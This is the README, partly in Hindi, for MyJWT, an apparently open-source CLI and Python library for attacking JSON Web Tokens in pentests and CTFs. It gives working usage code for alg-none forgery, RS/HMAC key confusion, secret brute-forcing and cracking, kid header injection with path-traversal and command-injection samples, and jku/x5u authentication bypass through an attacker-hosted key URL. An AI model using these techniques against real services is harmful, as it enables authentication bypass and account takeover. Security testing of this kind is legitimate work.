
JSON Web Token (JWT) पर क्रैकिंग और कमजोरियों का परीक्षण करने के लिए एक CLI
यह CLI पेंटेस्टर्स, CTF खिलाड़ियों या डेवलपर्स के लिए है।
आप अपने jwt को संशोधित कर सकते हैं, साइन कर सकते हैं, इंजेक्ट कर सकते हैं, आदि...
अधिक जानकारी के लिए दस्तावेज़ीकरण देखें।
यदि आपको कोई समस्या या सुधार दिखाई दे, तो एक मुद्दा भेजें। मैं जल्द से जल्द उत्तर दूंगा।
आनंद लें :)
दस्तावेज़ीकरण http://myjwt.readthedocs.io पर उपलब्ध है
myjwt को स्थापित करने के लिए, बस pip का उपयोग करें:
pip install myjwt
डॉकर इमेज से myjwt चलाने के लिए, चलाएँ:
docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
git पर myjwt स्थापित करने के लिए:
git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help
BlackArch पर myjwt स्थापित करने के लिए:
pacman -S myjwt
$ myjwt --help
Usage: myjwt [OPTIONS] JWT
This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Full documentation is at http://myjwt.readthedocs.io.
If you see problems or enhancement send an issue.I will respond as soon as possible.
Enjoy :)
All new jwt will be copy to the clipboard.
Options:
--version Show the version and exit.
--full-payload TEXT New payload for your jwt.Json format Required.
-h, --add-header TEXT Add a new key, value to your jwt header, if key
is present old value will be replaced.Format:
key=value.
-p, --add-payload TEXT Add a new key, value to your jwt payload, if
key is present old value will be
replaced.Format: key=value.
--sign TEXT Sign Your jwt with key given.
--verify TEXT verify your key.
-none, --none-vulnerability Check None Alg vulnerability.
--hmac PATH Check RS/HMAC Alg vulnerability.
--bruteforce PATH Bruteforce to guess the secret used to sign the
token.
-r, --crack TEXT regex to iterate all string possibilities to
guess the secret used to sign the token.
--kid TEXT Kid Injection sql
--jku TEXT Jku Header to bypass authentication
--x5u TEXT X5u Header to bypass authentication
--crt TEXT For x5cHeader, force crt file
--key TEXT For jku or x5c Header, force private key to
your key file
--file TEXT For jku Header and x5u Header, force file name
--print Print Decoded JWT
-u, --url TEXT Url to send your jwt.
-m, --method TEXT Method use for send request to url.(Default
GET).
-d, --data TEXT Data send to your url.Format: key=value. if
value = MY_JWT value will be replace by new
jwt.
-c, --cookies TEXT Cookies to send to your url.Format: key=value.
if value = MY_JWT value will be replace by new
jwt.
--help Show this message and exit.
| विकल्प | प्रकार | उदाहरण | सहायता |
|---|---|---|---|
| --sign | text | mysecretkey | अपनी कुंजी से अपने jwt पर हस्ताक्षर करें |
| --verify | text | mysecretkey | अपनी कुंजी सत्यापित करें। |
myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
पूरा उदाहरण यहाँ: 01-modify-jwt
myjwt YOUR_JWT --none-vulnerability
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])
पूरा उदाहरण यहाँ: 02-none-vulnerability
myjwt YOUR_JWT --sign YOUR_KEY
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)
पूरा उदाहरण यहाँ: 03-sign-key
myjwt YOUR_JWT --bruteforce PATH
from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)
पूरा उदाहरण यहाँ: 04-brute-force
myjwt YOUR_JWT --crack REGEX
myjwt YOUR_JWT --hmac FILE
from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)
पूरा उदाहरण यहाँ: 05-rsa-hmac-confusion
myjwt YOUR_JWT --kid INJECTION
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid
injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)
पूरा उदाहरण यहाँ: 06-kid-injection
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"
myjwt YOUR_JWT --jku YOUR_URL
from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)
पूरा उदाहरण यहाँ: 07-jku-bypass
myjwt YOUR_JWT --x5u YOUR_URL
from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)
पूरा उदाहरण यहाँ: 08-x5u-bypass
GitHub रिलीज़ देखें। नवीनतम https://github.com/mBouamama/MyJWT/releases/latest पर उपलब्ध है।
make lint के साथ लिंट जाँचेंmake test के साथ यूनिट_टेस्ट जाँचेंलॉग काफी लंबा हो गया है। यह अपनी स्वयं की फ़ाइल में स्थानांतरित हो गया है।
देखें CHANGES।
| विकल्प | प्रकार | उदाहरण | सहायता |
|---|
| --ful-payload | JSON | {"user": "admin"} | आपके jwt के लिए नया payload। |
| -h, --add-header | key=value | user=admin | आपके jwt हेडर में एक नई key, value जोड़ें, यदि key मौजूद है तो पुरानी value बदल दी जाएगी। |
| -p, --add-payload | key=value | user=admin | आपके jwt payload में एक नई key, value जोड़ें, यदि key मौजूद है तो पुरानी value बदल दी जाएगी। |
| विकल्प | प्रकार | उदाहरण | सहायता |
|---|
| -none, --none-vulnerability | कुछ नहीं | None Alg भेद्यता की जाँच करें। | |
| --hmac | PATH | ./public.pem | RS/HMAC Alg भेद्यता की जाँच करें, और अपने jwt को सार्वजनिक कुंजी से हस्ताक्षरित करें। |
| --bruteforce | PATH | ./wordlist/big.txt | टोकन पर हस्ताक्षर करने के लिए उपयोग किए गए गुप्त का अनुमान लगाने के लिए ब्रूटफ़ोर्स। सभी पासवर्ड (1 प्रति पंक्ति) के साथ txt फ़ाइल का उपयोग करें। |
| --crack | REGEX | "[a-z]{4}" | टोकन पर हस्ताक्षर करने के लिए उपयोग किए गए गुप्त का अनुमान लगाने के लिए सभी स्ट्रिंग संभावनाओं को पुनरावृत्त करने का रीजेक्स। |
| --kid | text | "00; echo /etc/.passwd" | Kid इंजेक्शन sql |
| --jku | text | MYPUBLICIP | Jku हेडर प्रमाणीकरण को बायपास करने के लिए, यदि आप अपनी jwks फ़ाइल का नाम बदलना चाहते हैं तो --file का उपयोग करें, और यदि आप अपनी स्वयं की निजी pem का उपयोग करना चाहते हैं तो --key का उपयोग करें। |
| --x5u | text | MYPUBLICIP | jku या x5c हेडर के लिए, यदि आप अपनी jwks फ़ाइल का नाम बदलना चाहते हैं तो --file का उपयोग करें, और यदि आप अपनी स्वयं की निजी pem का उपयोग करना चाहते हैं तो --key का उपयोग करें। |
| विकल्प | प्रकार | उदाहरण | सहायता |
|---|
| -u, --url | url | http://challenge01.root-me.org/web-serveur/ch59/admin | अपना jwt भेजने के लिए url. |
| -m, --method | text | POST | url पर अनुरोध भेजने के लिए उपयोग की जाने वाली विधि।(डिफ़ॉल्ट: GET)। |
| -d, --data | key=value | secret=MY_JWT | अपने url पर भेजने के लिए डेटा।प्रारूप: key=value। यदि value = MY_JWT है तो value आपके नए jwt से बदल दी जाएगी। |
| -c, --cookies | key=value | secret=MY_JWT | अपने url पर भेजने के लिए कुकीज़।प्रारूप: key=value। यदि value = MY_JWT है तो value आपके नए jwt से बदल दी जाएगी। |
| विकल्प | प्रकार | उदाहरण | सहायता |
|---|
| --crt | PATH | ./public.crt | x5cHeader के लिए, crt फ़ाइल को बाध्य करें |
| --key | PATH | ./private.pem | jku या x5c हेडर के लिए, अपनी कुंजी फ़ाइल पर निजी कुंजी को बाध्य करें |
| --file | text | myfile | jku हेडर के लिए, .json एक्सटेंशन के बिना फ़ाइल नाम को बाध्य करें |
| कुछ नहीं | डिकोड किया गया JWT प्रिंट करें | ||
| --help | कुछ नहीं | सहायता संदेश दिखाएं और बाहर निकलें। | |
| --version | कुछ नहीं | Myjwt संस्करण दिखाएं |